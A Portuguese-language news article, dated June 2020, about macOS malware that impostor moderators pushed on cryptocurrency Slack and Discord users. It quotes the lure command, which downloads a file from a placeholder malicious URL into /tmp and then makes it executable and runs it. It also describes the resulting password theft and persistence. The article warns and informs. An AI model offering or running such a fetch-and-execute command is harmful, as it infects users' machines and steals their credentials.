Problemas de segurança no Mac: novo malware atinge usuários de criptomoedas

Problemas de segurança no Mac: novo malware atinge usuários de criptomoedas

By Chris Roper - min. de leitura
Atualizado 04 junho 2020

Pesquisadores de segurança descobriram um novo malware para macOS sendo anunciado em grupos de bate-papo como o Slack e Discord, relacionados a criptomoedas. Remco Verhoef, fundador da DutchSec, escreveu que viu criminosos se passando por administradores ou moderadores nos canais de criptos, colocando mensagens e recomendando que os usuários digitassem um longo comando no Terminal, o que poderia ajudar em vários problemas.

cd / tmp && curl -s curl $ MALICIOUS_URL> script && chmod + x script && ./script

O comando acima baixou um binário de 34 MB chamado “script” para a pasta/tmp e executou o código na máquina da vítima. Embora a Apple possa sinalizar e bloquear esse binário malicioso, até agora parece que as proteções da Apple não estão funcionando para os arquivos que estão sendo executados diretamente via Terminal.

Uma vez executado, o malware define o script como administrador e, em seguida, executa uma função para alterar as permissões. A vítima também é solicitada a digitar sua senha no Terminal, que é então roubada pelo malware e salva em/tmp/dumpdummy. O arquivo script tenta burlar o sistema para conseguir ser iniciado sempre que o sistema for reiniciado.

Embora seja um caso pobre de engenharia social, o ataque aparentemente tem funcionado, já que criminosos enganam os usuários para que executem esse comando para corrigir uma série de problemas em seus Macs. Uma vez conectado ao comando remoto e servidor de controle, os atacantes podem executar comandos arbitrários na máquina infectada. No entanto, seus recursos são supostamente limitados.

Uma preocupação, no entanto, é salvar a senha do seu Mac em texto sem formatação. Isso significa que, mesmo que os usuários removam o malware e a limpeza não seja completa, os futuros programas mal-intencionados podem ter acesso a esse arquivo armazenado localmente, não criptografado, com sua senha raiz.

“Ainda não sabemos exatamente o que os hackers por trás do malware podem pretender fazer com o acesso às máquinas infectadas”, escreveu Thomas Reed, da Malwarebytes. “Mas, dado o fato de que as comunidades de mineração de criptomoedas foram os alvos, é justo apostar que eles estavam interessados ​​em roubar criptomoedas.”